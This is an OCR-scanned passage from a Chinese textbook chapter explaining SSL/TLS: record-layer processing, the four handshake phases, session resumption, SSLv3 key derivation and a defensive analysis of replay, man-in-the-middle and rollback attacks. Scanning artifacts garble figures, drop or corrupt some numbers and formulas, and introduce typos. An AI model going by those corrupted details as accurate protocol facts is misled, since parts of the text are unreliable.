SSL/TLS 作为 一 个 兼容 OSI 七 层 网 络 结构 模型 的 安全 通讯 协议 ,位 于 传输 层 和 应 用 层 之 
间 , 对 用 户 来 说 是 一 个 可 选 层 。 协 议 运行 于 所 有 的 可 靠 传输 连接 之 上 ,这 就 意味 着 此 安全 协议 


不 必 考 虑 底层 数据 传输 的 可 靠 性 \ 传 输 流量 控制 等 细节 ,而 专心 解决 安全 问题 。 可 靠 的 传输 层 
我 们 应 用 最 多 的 就 是 TCP, 图 12. 22 显示 了 SSL/TLS 在 协议 栈 的 位 置 。 此 协议 的 设计 目标 是 
为 应 用 提供 防止 窃听 自 改 和 消息 伪造 的 通信 和 手段 ,同时 保证 通信 消息 的 完整 性 和 可 用 性 。 


HTTP/ SHTTP WEE SMTP 


SSL or TLS 
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了 


图 12.22 SSL 在 协议 栈 中 的 位 置 


2. SSL/TLS 分 层 模型 

SSL/TLS 是 分 层 协议 ,从 结构 上 分 为 两 层 , 由 一 个 记录 层 以 及 记录 层 上 承载 的 不 同 消 
息 类 型 组 成 。 而 记录 层 又 会 由 某 种 可 靠 的 传输 层 协议 如 TCP 来 承载 ,如 图 12. 23 所 示 。 底 
层 为 记录 层 协议 (Record Protocol) ,高 层 由 4 个 并 列 的 协议 构成 : 握手 协议 (Handshake 
Protocol) 密码 规范 变更 协议 (Change Cipher Spec Protocol) 报警 协议 (Alert Protocol) 、 
应 用 数据 协议 (Application Data Protocol) 。 


应 用 数据 协议 | | 警示 协议 | | 密码 规范 变更 协议 | “| 握手 协议 


记录 层 协议 


1 
可 靠 传输 层 


12.23 SSL 协议 结构 


SSL/TLS 连接 分 为 两 个 阶段 , 即 握手 和 数据 传输 阶段 。 握 手 阶段 对 服务 器 进行 认证 并 
确立 用 于 保护 数据 传输 的 加 密 密 钥 , 必 须 在 传输 任何 应 用 数据 之 前 完成 握手 。 一 旦 握手 完 
成 ,数据 就 被 分 成 一 系列 经 过 保护 的 记录 进行 传输 。 

密码 规范 变更 协议 由 单个 消息 组 成 ,该 消息 只 包含 一 个 值 为 1 的 单个 字 节 。 该 消息 的 
唯一 作用 就 是 使 未 决 状态 复制 为 当前 状态 ,更 新 用 于 当前 连接 的 密码 组 。 为 了 保障 SSL 传 
输 过 程 的 安全 性 ,双方 应 该 每 隔 一 段 时 间 改 变 一 下 加 密 规 范 。 

报警 协议 为 对 等 实体 传递 SSL 的 相关 警告 。 如 果 在 通信 过 程 中 某 一 方 发 现任 何 异常 ,就 
需要 给 对 方 发 送 一 条 警示 消息 通告 。 警 示 消息 有 两 种 : 一 种 是 Fatal 错误 ,如 传递 数据 过 程 
中 ,发 现 错误 的 MAC, 双 方 就 需要 立即 中 断 会 话 , 同 时 消除 自己 缓冲 区 相应 的 会 话 记 录 ; 第 二 
种 是 Warning 消息 ,这 种 情况 通信 双方 通常 都 只 是 记录 日 志 , 而 对 通信 过 程 不 造成 任何 影响 。 

应 用 数据 协议 功能 是 将 应 用 数据 直接 传递 给 记录 协议 。 

1) 记录 协议 

在 SSL 中 ,实际 的 数据 传输 是 使 用 SSL 记录 协议 来 实现 的 。 一 个 SSL 记录 由 两 部 分 
构成 : 记录 头 和 非 零 长 度 的 数据 。 记 录 头 信息 的 工作 就 是 为 接收 实现 提供 对 记录 进行 解释 
所 必需 的 信息 。 在 实际 应 用 中 , 它 包 括 记 录 的 内 容 类 型 ,记录 长 度 和 SSL 版 本 。 记 录 头 可 
以 是 3 字 节 或 是 4 字 节 ( 当 有 填充 数据 时 使 用 ) ,该 头 主要 用 于 指示 记录 数据 的 类 型 和 长 度 。 
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3 字 节 头 的 最 大 记录 长 度 是 32 767 字 节 ,4 字 节 头 的 最 大 记录 长 度 是 16 383 字 节 。 其 中 握 
手 协议 / 密 钥 规范 变更 协议 /报警 协议 的 报 文 要 求 必须 放 在 一 个 SSL 记录 层 的 记录 里 ,但 应 
用 数据 协议 的 报 文 允许 占用 多 个 SSL 记录 层 记录 来 传送 。 

记录 层 协议 将 高 层 协议 看 作 本 层 的 协议 数据 单元 (PDU), 为 其 提供 分 片 .压缩 、 摘 要 
(MAC) .加 密 、 封 装 服务 如 图 12. 24 所 示 ; 此 外 ,将 从 下 层 收 到 的 数据 报 进行 拆 封 . 解 密 、 摘 
要 验证 ,组 包 之 后 ,提交 给 高 层 协 议 。 由 此 可 以 看 出 ,记录 层 协 议 实际 上 是 高 层 协议 的 载体 ， 
通信 的 保密 性 和 完整 性 是 由 这 一 层 来 保证 的 。 


| 应 用 数据 


压缩 (可 选 ) | 压缩 数据 


添加 MAC 压缩 数据 (数据 ) | MAC 


添加 记录 头 | 记录 头 | ”加 密 的 数据 和 MAC 


内 容 类 型 | 起 涪 ，| 记 录 长 度 | 3 字 节 记录 头 


内 容 类 型 | 中 | Escape 们 | 记录 长 度 


坟 友 长度 |4 字 节 记 录 关 


12.24 SSL 记录 层 操 作 及 记录 头 内 容 


(1) 分 片 : 将 消息 分 割 成 不 超过 2* 字 节 的 明文 记录 。 

(2) 压缩 : 所 有 记录 采用 在 “当前 会 话 状态 ”中 定义 的 压缩 算法 进行 压缩 ,压缩 算法 将 明文 
结构 翻译 成 压缩 结构 。 压 缩 不 能 引起 信息 丢失 ,也 不 能 使 内 容 增 加 超过 22 字 节 。 若 解压 功能 
使 解压 后 长 度 超过 2* 字 节 , 则 会 产生 一 个 错误 压缩 失败 报警 。SSL v3 中 没有 指定 压缩 算法 。 

(3) 计算 MAC 散 列 函 数 : 它 由 握手 协议 中 的 CIPHER_CHOICE 消息 确定 。MAC 的 
计算 公式 : 

TLS: MAC= HMAC hash(MAC write secret, seq_num + type+ version + length+ content) 

SSLv3: MAC = hash(MAC write_secret + pad_2 + hash(MRC_write_secret + pad_1 + seqnum + content_ 

type + length + content) ) 

MAC _write_secret 是 MAC 加 密 密 钥 ,seq_num 是 该 记录 的 序列 号 ,通过 在 数据 中 包 
含 “序列 号 ”可 以 有 效 地 阻止 报 文 重 放 攻 击 . 但 序号 不 在 记录 中 ,只 能 检查 这 种 攻击 并 不 能 纠 
正 , 因 此 SSL 必须 运行 在 可 靠 的 传输 层 之 上 。pad_1 和 pad_2 是 计算 MAC 时 的 填充 数据 ， 
由 于 在 计算 MAC 时 对 数据 进行 填充 和 多 次 散 列 本 身 并 没有 很 大 的 意义 ,因此 在 后 续 版 本 
TLS v1.0 中 计算 MAC 的 公式 有 所 改变 。 

(4) 加 密 : 用 对 称 加 密 算法 给 添加 了 的 压缩 消息 加 密 。 而 且 加 密 不 能 增加 2" 字 节 以 上 
的 内 容 长 度 。 


(5) 添加 记录 头 信息 : 


号 和 次 版 本 号 。 
2) 握手 协议 


记录 头 信息 的 工作 就 是 为 接收 实现 提供 对 记录 进行 解释 所 必须 
的 信息 。 在 实际 应 用 中 , 它 是 指 3 种 信息 : 内 容 类 型 .压缩 长 度 、 版 本 。 版 本 又 包括 主 版 本 


握手 协议 是 SSL/TLS 中 最 为 重要 的 一 个 协议 , 它 负责 在 建立 安全 连接 之 前 在 SSL/TLS 
客户 代理 和 SSL/TLS 服务 器 之 间 鉴 别 双方 身份 ,协商 加 密 算 法 和 密 钥 参 数 ,为 建立 一 条 安全 
的 通信 连接 做 好 准备 。 握 手 消息 的 结构 如 图 12. 25 所 示 ,握手 消息 的 参数 如 表 12. 1 所 示 。 


握手 消息 类 型 (8bits) 握手 消息 长 度 (24bits) 握手 消息 


图 12.25 ”握手 消息 结构 


表 12.1 握手 消息 参数 


消息 类 型 参 数 
HelloRequest Null 
ClientHello Version,random, session_id, cipher_suite, compression_methods 
ServerHello Version,random, session_id, cipher_suite, compression_methods 
Certificate Chain of x509v3 certificates 


ServerKeyExchange Parameters,signature 


CertificateRequest Type,authorities 
ServerHelloDone Null 

Certificate Verify Signature 
ClientKeyExchange Parameters, signature 
Finished Hash Value 


SSL 协议 的 握手 分 为 4 个 阶段 ,图 12. 26 描述 了 握手 步骤 。 
客户 端 服务 
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图 12. 26 ”SSL 协议 完全 握手 过 程 
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秦 于 案例 的 网 络 安全 技术 与 实践 


(1) 第 一 阶段 : 建立 安全 能 力 。 

Q@ ClientHello 消息 。 

为 了 在 客户 端 和 服务 器 之 间 开 始 通信 ,客户 端 必须 初始 化 一 个 ClientHello 消息 。 该 消 
息 的 目的 是 向 服务 器 传输 连接 首选 项 ,内 容 包 括 client_version、random、session_id、cipher_ 
suite compression_methods 等 。 

version: 该 域 提供 了 客户 端 所 能 支持 的 最 高 SSL 版 本 号 , 它 包含 两 个 字段 major 和 
minor。 对 于 SSL v3 来 说 ,major 王 3 .minor 一 0。 

。 random: 该 域 中 包含 一 个 由 客户 端 生成 的 随机 结构 , 它 将 用 于 SSL 协议 中 后 面 的 密 

码 学 计算 。 这 个 32 字 节 的 随机 结构 并 不 全 部 都 是 随机 的 。 相 反 , 它 包含 一 个 4 字 
节 的 日 期 /时 间 戳 ,其 余 的 28 字 节 数据 是 随机 生成 的 。 日 期 /时 间 惟 有 助 于 防止 重 
放 攻 击 。 

。 session_id: 32 字 节 字符 串 。 代 表 客 户 端 指示 它 希望 重复 使 用 前 一 次 连接 时 的 加 密 
密 钥 资料 ,而 不 是 再 产生 新 的 资料 。 这 样 会 加 快 连接 的 速度 ,因为 公用 密 钥 操 作 的 
计算 开销 昂贵 。 如 果 没 有 可 用 的 session_id, 客 户 端 就 要 为 此 次 连接 生成 新 的 加 密 
参数 。 

。 cipher_suite: 该 域 中 包含 一 个 客户 端 支持 的 密码 算法 组 合 的 列表 。 该 列表 按照 客 

户 端 优先 选择 的 次 序 排列 (也 就 是 第 一 选择 优先 )。 该 列表 用 于 使 服务 器 了 解 客 户 
端 所 支持 的 密码 组 ,但 是 最 终 却 是 由 服务 器 来 决定 使 用 何 种 密码 算法 。 如 果 服 务 器 
没有 从 该 列表 中 找到 一 个 可 以 接受 的 选择 , 则 将 返回 一 个 握手 失败 警告 并 关闭 该 
连接 。 

。 compression_methods: 该 域 列 出 客户 端 已 知 的 所 有 压缩 算法 。 该 域 通常 在 SSL v3 

中 不 使 用 ,但 在 TLS 要 求 必须 支持 。 

发 送 一 个 ClientHello 消息 之 后 ,客户 端 等 待 一 个 ServerHello 消息 。 如 果 服 务 器 返回 
除了 ServerHello 消息 之 外 的 任何 其 他 的 握手 消息 ,就 会 导致 一 个 致命 的 错误 ,然后 通信 将 
终止 。 

Q@ ServerHello 消息 。 

服务 器 处 理 客户 端 ClientHello 问候 消息 并 且 对 客户 端 问候 消息 作出 握手 失败 警告 或 
者 发 出 服务 器 问候 消息 ServerHello 作为 响应 。 它 包括 server_version、random session_id、 
cipher_ suite、compression_methods 等 。server_version random, session_id、cipher_suite 和 
compression_methods 字段 分 别 是 在 连接 中 的 服务 器 在 客户 端 列表 中 选择 的 使 用 版 本 、 随 机 数 、 
会 话 ID 加密 算 法 和 压缩 算法 。 服 务 器 提供 的 随机 值 将 同 客户 端 提供 的 随机 值 , 以 及 以 后 的 
pre_master_secret 一 起 产生 连接 所 使 用 的 密 钥 。 在 通常 情况 下 .服务 器 提供 一 个 可 有 客户 端 恢 
复 会 话 使 用 的 session_id。 如 果 服 务 器 不 想 恢 复 会 话 , 就 可 以 提供 0 长 度 的 session_id。 

(2) 第 二 阶段 : 服务 器 鉴别 和 密 钥 交换 。 

@ 服务 器 的 Certificate 消息 。 

服务 器 在 发 出 ServerHello 消息 之 后 接着 发 出 服务 器 证 书 。 证 书 的 类 型 必须 是 由 被 选 
择 的 加 密 套 件 中 密 钥 交换 算法 所 支持 的 ,通常 是 X509v3 版 本 的 证 书 , 客 户 端的 证 书 的 类 型 
与 服务 器 的 证 书 类 型 相同 。 这 条 消息 主要 内 容 是 一 个 证 书 或 者 一 个 证 书 序列 (证 书 链 ) 。 证 
书 链 中 包含 一 序列 版 本 的 证 书 ,按照 颁 发 机 构 的 级 别 由 低 到 高 的 顺序 组 成 一 维 向 量 表 , 从 代 


表 发 送 消息 方 身份 的 个 人 证 书 一 直到 根 证 书 。 该 消息 是 可 选 消息 ,当选 择 不 发 送 证 书 时 ,不 
需要 发 送 该 消息 。 

@ ServerKeyExchange 消息 。 

服务 器 密 钥 交换 消息 是 一 条 可 选 消息 ,包含 了 服务 器 端 用 于 密 钥 交换 的 算法 的 参数 。 
当 服 务 器 没有 发 送 ServerCertificate 或 由 于 用 户 的 加 密 套 件 设 定 ,ServerCertificate 中 选用 
了 没有 密 钥 交换 功能 的 非 对 称 算法 做 数字 签名 时 ,需要 发 送 这 条 消息 通知 客户 端 密 钥 交 换 
算法 的 参数 。 

@® CertificateRequest。 

该 消息 是 可 选 消 息 ,在 要 求实 现 客户 端 认 证 时 请 求 客 户 端 证 书 。 该 消息 包含 了 请 求 客 
户 端 发 送 证 书 的 类 型 (用 证 书 使 用 的 签名 算法 作为 标识 ) 列 表 和 客户 端 证 书 的 颁发 机 构 名 称 
(用 X. 509 证 书 规范 中 定义 的 DistinguishedName 标识 ) 列 表 。 

@ ServerHelloDone 消息 。 

服务 器 端 Hello 过 程 结束 消息 ,标志 着 服务 器 的 Hello 信息 发 送 完 毕 ,开始 等 待 并 接收 
客户 端的 响应 。 

(3) 第 三 阶段 : 客户 端 鉴别 和 密 钥 交 换 。 

OO 客户 端的 Certificate 消息 。 

此 消息 为 可 选 消 息 , 当 要 求 客 户 端 认 证 时 才 需 要 。 此 时 如 果 客 户 端 没有 合适 的 证 书 , 则 
服务 器 回应 一 个 握手 失败 的 致命 性 的 报警 。 

©@ ClientKeyExchange。 

消息 提供 创建 随机 密码 串 (pre_master_secrect) 时 客户 端 所 提供 的 资料 。 当 使 用 RSA 
密 钥 交换 时 ,这 就 是 客户 端 产生 一 个 pre_master_secrect 结构 并 用 服务 器 的 密 钥 对 其 进行 
加 密 , 然 后 将 加 密 的 结果 传送 给 服务 器 。 

© CertificateVerify 。 

此 消息 是 可 选 消息 ,在 提供 客户 端 认 证 时 需要 。 该 消息 在 发 送 完 有 数字 签名 能 力 的 
ClientCertificate 之 后 发 送 , 用 于 验证 证 书 的 拥有 者 就 是 本 次 通信 的 对 方 。 其 中 包含 一 个 用 
客户 端 私 钥 进 行 签名 的 从 第 一 条 消息 以 来 的 所 有 握手 消息 的 MAC 值 。 

(4) 第 四 阶段 : 完成 握手 协议 。 

OO 客户 端的 ChangeCipherSpec 消息 。 

客户 端 发 送 ChangeCipherSpec 消息 ,发 送 实 现 已 经 切换 到 新 磋商 好 的 算法 和 密 钥 资 
料 , 而 未 来 的 消息 将 使 用 那些 算法 保护 。 

@ 服务 器 的 ChangeCipherSpec 消息 。 

服务 器 端 同样 发 送 ChangeCipherSpec 消息 。 

@ Finished 消息 。 

握手 阶段 结束 消息 。 此 消息 有 两 个 作用 : 一 是 表示 握手 过 程 已 经 结束 ,可 以 进行 应 用 
数据 的 传送 ; 二 是 验证 握手 过 程 的 正确 性 。 它 总 是 在 加 密 规范 变更 消息 (Change Cipher 
Spec) 发 送 之 后 被 立即 发 送 ,因此 它 是 通信 过 程 中 第 一 条 使 用 新 的 加 密 参 数 进行 加 密 的 消 
息 。 该 消息 分 两 类 : 服务 器 发 送 的 Server Finished 和 客户 端 发 送 的 ClientFinished。 

3) 会 话 恢复 

整个 握手 的 开销 非常 巨大 ,为 了 减少 这 种 性 能 开销 ,在 SSL 中 集成 了 会 话 恢复 机 制 。 


网 络 魏 会 放 议 


秦 于 案例 的 网 络 安全 技术 与 实践 


如 果 客 户 端 与 服务 器 已 经 通信 过 一 次 , 则 它们 就 可 以 跳 过 整个 握手 阶段 而 直接 进行 数据 传 
输 , 握 手中 开销 最 大 的 就 是 进行 非 对 称 加 解密 ,而 会 话 恢复 允许 新 的 连接 使 用 上 一 次 握手 中 
确立 的 pre_master_secret, 这 就 避免 了 公用 密 钥 加 解密 的 计算 开销 。 

SSL 区 分 连接 与 会 话 ,连接 代表 一 种 特定 的 通信 通道 (通常 映射 为 TCP 连接 ) 以 及 密 
钥 、 加 密 选 择 和 序号 状态 等 内 容 , 会 话 则 是 一 种 虚拟 的 结构 , 它 代 表 协 商 好 的 算法 和 Pre_ 
master_secret。 每 次 当 给 定 的 客户 端 与 服务 器 经 过 完整 的 密 钥 交 换 并 确立 新 的 master_ 
secrect 时 就 会 创建 一 个 会 话 。 

一 个 给 定 的 会 话 可 以 与 多 条 连接 关联 ,尽管 给 定 会 话 中 的 所 有 连接 均 共 享 同 一 个 
master_secrect, 但 是 每 个 连接 又 有 它们 自己 的 加 密 密 钥 ,MAC 密 钥 和 会 话 恢复 允许 根据 共 
同 的 master_secret 来 产生 一 组 新 的 对 称 密 钥 。 图 12. 27 描述 了 简化 握手 过 程 。 

当 客 户 端 与 服务 器 进行 第 一 次 进行 交互 时 ,它们 创 客户 端 服务 端 
建 一 个 新 的 连接 和 一 个 新 的 会 话 。 如 果 服 务 器 准备 恢 
复 会 话 的 话 , 就 会 在 ServerHello 消息 中 给 客户 端 一 个 
session_id, 并 将 master_secret 缓存 起 来 供 以 后 引用 。 | = = ServerHello 
当 这 个 客户 端 初始 化 一 条 与 服务 器 的 新 连接 时 , 它 就 会 Chat 
在 其 ClientHello 消息 中 使 用 session_id。 而 服务 器 通 ‘pherSpec | 

| = 四 
过 在 其 ServerHello 中 使 用 相同 的 session_id 来 同意 恢 Mished 
复 会 话 。 此 刻 , 就 会 跳 过 余下 的 握手 部 分 ,而 使 用 保存 
的 master_secret 来 产生 所 有 的 加 密 密 钥 。 -—™ 

4) 密 钥 导出 | 一 

一 旦 交换 了 pre_master_secret, 每 一 种 实现 都 需要 
将 其 扩展 成 独特 的 加 密 密 钥 , 用 以 完成 加 密 、 认 证 等 任 
务 。 我 们 使 用 一 种 密 钥 导出 函数 来 实现 这 种 扩展 。 
SSL v3 与 TLS 的 密 钥 导 出 函数 是 相似 的 ,只 是 在 所 使 
用 的 具体 加 密 变 换 上 有 所 不 同 。 我 们 仅 介绍 SSL v3 密 钥 导出 ,TLS 密 钥 生 成 请 参考 TLS 
协议 文档 。 图 12. 28 描述 了 密 钥 计 算 过 程 。 


客户 端 随机 数 | [premaster_secret| | 服务 端 随 机 数 
Client.random Server.random 


ClientHello 
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| 
angeCipherSpes 


图 12. 27 ”会话 恢复 流程 
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图 12.28 密 钥 导 出 


SSL/TLS 的 密 钥 生成 过 程 可 以 简 述 为 : 使 用 客户 端 提供 的 pre_master_secret 参数 计 
算出 Master_secret, 再 由 Master_secret 计算 得 到 安全 通信 所 需 的 各 种 密 钥 。 
Master_secret 的 计算 方法 如 下 : 
Master_secret = MD5(Pre master secret + SHA('A'+Pre master secret+ 
ClientHello. random + ServerHello. random) ) + 
MD5 (Pre master secret + SHA('BB'+ Pre master secret+ 
ClientHello. random + ServerHello. random) ) + 


MD5 (pre_ master secret + SHA( 'CCC' + Pre master secret+ 
ClientHello. random + ServerHello. random) ) ; 


其 中 ClientHello. random 和 ServerHello. random 分 别 指 握手 过 程 中 客户 端 和 服务 器 提供 
的 随机 数 o 得 到 本 Master_secret 之 后 » 可 以 进行 密 钥 的 计算 o 方法 是 计算 出 一 个 足够 长 的 
密 钥 块 (Key Block) ,然后 分 配给 加 /解密 所 需要 的 各 个 密 钥 。 
Key Block 的 计算 方法 如 下 : 
key_block = MD5(Master_ secret + SHA( 'A' + Master_secret + 
ServerHello. random + ClientHello. random)) + 
MD5 (Master_secret + SHA( 'BB' + Master_secret+ 
ServerHello. random + ClientHello. random) ) + MD5 (Master_secret 
+ SHA( 'CCC' + Master_ secret + ServerHello. random + 
ClientHello. random) ) + … 


上 述 计 算 过 程 将 不 断 进行 ,直到 生成 key block 的 字 节 数 足 够 生成 所 有 需要 的 最 终 密 
钥 。 然 后 对 key block 进行 切 分 ,从 而 得 到 所 需要 的 最 终 密 钥 。 如 果 切 分 完成 后 key block 
还 有 剩余 字 节 , 则 直接 将 其 抛弃。key block 被 依次 分 配 到 以 下 的 参数 之 中 。 密 钥 的 分 配 
方案 : 

client write_MAC_secret[MAC 算法 结果 的 长 度 ]; 

server_write_MAC_secret[MAC 算法 结果 的 长 度 ]; 

client_write_key[ 对 称 加 密 算法 密 钥 的 长 度 ]; 

server_write_key[ 对 称 加 密 算法 密 钥 的 长 度 ]; 

client_write_IV[ 对 称 加 密 算法 初始 化 向 量 的 长 度 ]; 

server_write_IV[ 对 称 加 密 算法 初始 化 向 量 的 长 度 ]; 


12.3.2 SSL/TLS 应 用 


1. 单 向 认证 

单 向 认证 又 称 匿名 SSL 连接 ,这 是 SSL 安全 连接 的 最 基本 模式 , 它 便于 使 用 ,主要 的 浏 
览 器 都 支持 这 种 方式 ,适合 单 向 数据 安全 传输 应 用 。 在 这 种 模式 下 客户 端 没 有 数字 证 书 , 只 
是 服务 器 端 具有 证 书 , 以 证 明 用 户 访问 的 是 自己 要 访问 的 站 点 。 典 型 的 应 用 就 是 用 户 进 行 
网 站 注册 时 采用 ID 十 口令 的 匿名 认证 。 

2. 双向 认证 

双向 认证 是 对 等 的 安全 认证 ,这 种 模式 通信 双方 都 可 以 发 起 和 接收 SSL 连接 请 求 。 通 
信 双 方 可 以 利用 安全 应 用 程序 或 安全 代理 软件 ,前 者 一 般 适 合 于 B/S 结构 ,而 后 者 适用 于 
C/S 结构 ,安全 代理 相当 于 一 个 加 密 / 解 密 的 网 关 , 这 种 模式 双方 皆 需 安装 证 书 , 进 行 双向 认 
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证 。 这 就 是 网 上 银行 的 B2B 的 专业 版 等 应 用 。 

3. 电子 商务 中 的 应 用 

电子 商务 与 网 上 银行 交易 不 同 , 因 为 有 商户 参加 ,形成 客户 一 商家 一 银行 ,两 次 点 对 点 
的 SSL 连接 。 客 户 商家、 银行 都 必须 具有 证 书 ,进行 两 次 点 对 点 的 双向 认证 。 


12.3.3 安全 性 分 析 


SSL 协议 是 为 客户 端 和 服务 器 之 间 在 不 安全 的 通道 上 建立 安全 的 连接 而 设计 的 ,因而 
需要 考虑 各 种 可 能 的 攻击 。 假 设 攻击 者 有 相当 的 计算 资源 且 不 可 能 从 协议 之 外 的 任何 资源 
获得 秘密 信息 ,能够 在 通信 通道 上 实施 窃听 、 修 改 、 删 除 、 重 放 、 破 坏 消息 、man-in-the-middle 
的 攻击 ,能 够 假冒 客户 端 或 服务 ,下 面 分 析 SSL 是 如 何 设计 来 抵抗 各 种 常见 攻击 的 。 

1. 通信 业务 流 分 析 

SSL 协议 提供 了 通信 消息 的 保密 性 和 完整 性 ,在 选择 适当 的 密码 算法 的 基础 上 ,所 有 
在 网 络 中 传输 的 消息 都 被 加 密 , 并 且 使 用 加 密 消息 认证 码 对 消息 的 完整 性 进行 保护 。 如 果 
常规 的 攻击 失败 ,攻击 者 可 能 会 转向 更 复杂 的 攻击 。 通 信 量 分 析 是 一 种 恶意 的 被 动 攻击 , 它 
的 目标 在 于 通过 检查 包 中 未 加 密 的 域 及 属性 ,以 获得 受 保护 会 话 的 机 密 信 息 。 虽 然 通信 过 
程 中 的 会 话 数据 是 加 密 的 ,但 是 在 协议 的 记录 协议 中 记录 头 中 许多 域 是 没有 被 保护 的 。 通 
信 业 务 流 分 析 试图 通过 检查 被 保护 的 会 话 中 未 进行 保护 的 某 些 域 或 会 话 的 属性 ,从 而 发 现 
有 价值 的 信息 。 例 如 ,通过 检查 没有 经 过 加 密 的 包 的 源 地 址 .目标 地 址 、 端 口 等 内 容 ,能 够 获 
得 有 关 通 信和 双方 的 地 址 \ 正 在 使 用 的 网 络 服务 等 信息 ,在 某 些 特定 情况 下 ,有 时 甚至 可 以 获 
得 有 关 商 业 或 个 人 关系 方面 的 有 价值 信息 。 上 述 弱 点 之 所 以 会 出 现 ,是 因为 密 文 长 度 暴 露 
了 明文 的 长 度 。 在 块 加 密 模式 中 支持 随机 填充 ,而 在 流 加 密 模式 中 却 不 支持 。 

2. 重 放 攻击 

仅 靠 使 用 报 文 鉴别 码 MAC 不 能 防止 对 方 重复 发 送 过 时 的 信息 包 。 通 过 在 生成 的 数据 
中 加 入 隐藏 的 序列 号 ,来 防止 重 放 攻 击 。 这 种 机 制 也 可 以 防止 被 耽搁 的 、 被 重新 排序 的 或 者 
是 被 删除 的 数据 的 干扰 。 序 列 号 的 长 度 是 位 。 另 外 ,序列 号 由 每 个 连接 方向 分 别 维护 , 而 且 
在 每 一 次 新 的 密 钥 交换 时 进行 更 新 ,所 以 不 会 有 明显 的 弱点 。 

3. 中 间 人 攻击 

SSL v3 中 包含 了 对 Diffie-Hellman 密 钥 交换 进行 了 临时 加 密 的 支持 。Diffie-Hellman 
是 一 种 公开 密 钥 算法 , 它 能 有 效 地 提供 完善 的 保密 功能 ,对 于 SSL 来 说 是 一 个 有 益 的 补充 。 
在 密 钥 交换 系统 中 ,服务 器 必须 指定 模 数 和 原始 根 , 以 及 Diffie-Hellman 的 指数 。 为 了 防止 
服务 器 端 产生 的 陷 门 ,客户 端 应 该 对 模 数 和 原始 根 进行 仔细 的 检查 ,看 它们 是 否 为 固定 公共 
列表 上 的 可 靠 数值 。 在 SSL v3 中 ,通过 对 服务 器 端的 Diffie-Hellman 指数 的 鉴别 ,可 以 抵 
御 中 间 人 攻击 。 另 外 ,在 SSL v3 中 并 不 支持 具有 较 高 性 能 的 Diffie-Hellman 变量 ,如 较 小 
的 指数 变量 或 椭圆 曲线 变量 。 

4. 密码 回 深 攻 击 

SSLv2 的 密 钥 交换 协议 中 有 一 个 严重 的 缺陷 : 主动 攻击 者 能 够 在 暗地里 迫使 一 个 用 户 
使 用 功能 被 削弱 的 出 口 加密 算 法 ,即使 通信 双方 都 支持 并 首选 了 较 高 等 级 的 算法 。 这 就 是 
密码 组 回 滚 攻击 主 , 它 通过 编辑 在 Hello 报 文中 发 送 的 所 支持 密码 组 的 明文 列表 来 达到 自 
身 的 目的 。SSL v3 修正 了 这 个 缺陷 , 它 使 用 一 个 master_secrect 来 对 所 有 的 握手 协议 报 文 


进行 鉴别 ,这 样 一 来 , 便 可 在 握手 结束 时 检查 出 攻击 方 的 上 述 行为 ,如 果 有 必要 ,还 可 结束 会 
话 。 所 有 初始 的 握手 协议 报 文 在 传送 时 都 是 未 受 保护 的 ,此 时 密 钥 交换 协议 会 将 当前 会 话 
状态 改 为 未 决 的 会 话 状 态 ,而 不 是 修改 当前 使 用 中 的 各 个 参数 。 在 协商 完成 之 后 ,通信 的 每 
一 方 都 发 送 一 个 ChangeCipherSpec, 该 报 文 仅仅 是 警告 对 方 将 当前 状态 升级 为 未 决 的 会 话 
状态 。 虽 然 该 报 文 未 受 保护 ,但 是 新 的 会 话 状 态 还 是 将 以 下 一 个 报 文 为 开始 。 紧 跟 此 报 文 
之 后 的 是 Finished 报 文 , 它 包含 了 一 个 消息 认证 码 (MAC) ,此 MAC 由 被 master_secrect 加 
密 过 的 所 有 握手 协议 报 文 计算 得 出 。 基 于 特殊 的 非 安全 性 因素 ,changeCipherSpec 报 文 和 
alert 报 文 在 Finished 报 文中 没有 进行 鉴别 。48 字 节 长 的 master_secrect 从 未 被 泄露 出 去 ， 
而 且 会 话 密 钥 由 它 产生 。 这 就 保证 了 即使 会 话 密 钥 被 人 截获 ,master_secrect 仍 可 安然 无 
盖 , 所 以 握手 协议 报 文 能 够 安全 地 得 到 鉴别 。Finished 报 文 使 用 新 建 的 密码 组 对 自身 进行 
保护 。 通 信 各 方 只 有 在 收 到 对 方 的 Finished 报 文 并 对 其 进行 核实 后 , 才 会 接收 应 用 层 的 
数据 。 

Master_secret 就 是 一 切 ,攻破 了 它 就 攻破 了 整个 协议 ,要 保护 好 服务 器 的 私 钥 ,在 普通 
RSA 模式 和 静态 DH 模式 下 攻破 了 服务 器 的 私 钥 就 会 导致 master_secret 的 攻破 ; 良好 的 
随机 性 是 根本 ,如果 任 一 方 都 没有 使 用 安全 的 随机 数 发 生 器 ,那么 那些 协议 就 有 危险 ; 应 尽 
量 使 用 高 性 能 速度 快 的 算法 。 


12.4 应 用 层 安全 通信 协议 


网 络 层 安全 协议 只 是 为 主机 与 主机 的 数据 通信 增加 安全 性 ,而 传输 层 安全 协议 是 为 进 
程 之 间 的 数据 通信 增加 安全 属性 。 这 两 个 安全 协议 并 不 区 分 一 个 具体 应 用 程序 的 要 求 ,只 
要 在 主机 之 间或 进程 之 间 建 立 起 一 条 安全 通道 ,那么 根据 此 协议 ,所 有 通过 该 安全 通道 的 信 
息 都 要 自动 用 同一 种 方式 进行 数据 安全 加 密 。 如 果 要 根据 某 个 具体 的 应 用 程序 对 安全 的 实 
际 要 求 来 进行 安全 加 密 的 话 , 就 必须 要 借助 于 应 用 层 的 安全 协议 ,也 只 有 应 用 层 才能 够 对 症 
下 药 , 才 能 够 提供 这 种 特定 的 安全 服务 。 应 用 层 安 全 协议 主要 有 S/MIME、 PGP、PEM、 
SET、Kerberos\SHTTP、SSH 等 。 

在 应 用 层 提供 安全 机 制 的 优点 在 于 : 以 用 户 为 背景 执行 ,因此 更 容易 访问 用 户 赁 据 , 比 
如 私人 密 钥 等 ; 对 用 户 想 保护 的 数据 具有 完整 的 访问 权 , 简 化 了 提供 某 些 特殊 的 服务 的 工 
作 , 比 如 不 可 抵赖 性 ; 应 用 可 自由 扩展 ,不 必 依 赖 操 作 系 统 来 提供 。 由 此 可 见 安 全 服务 直接 
在 应 用 层 上 处 理 单独 应 用 需求 是 最 灵活 的 方法 ,例如 一 个 邮件 系统 可 能 需要 对 发 出 的 邮件 
进行 签名 ,这 在 由 低层 提供 安全 服务 的 情况 下 是 无 法 实现 的 ,因为 它 不 知道 邮件 的 结构 和 哪 
些 部 分 需要 签名 。 所 以 无 论 低层 协议 能 提供 何 种 形式 的 安全 功能 ,在 应 用 层 提供 安全 服务 
都 是 有 理由 的 。 

在 应 用 层 提供 安全 机 制 的 缺点 在 于 : 针对 每 个 应 用 ,都 要 单独 设计 一 套 安 全 机 制 。 这 
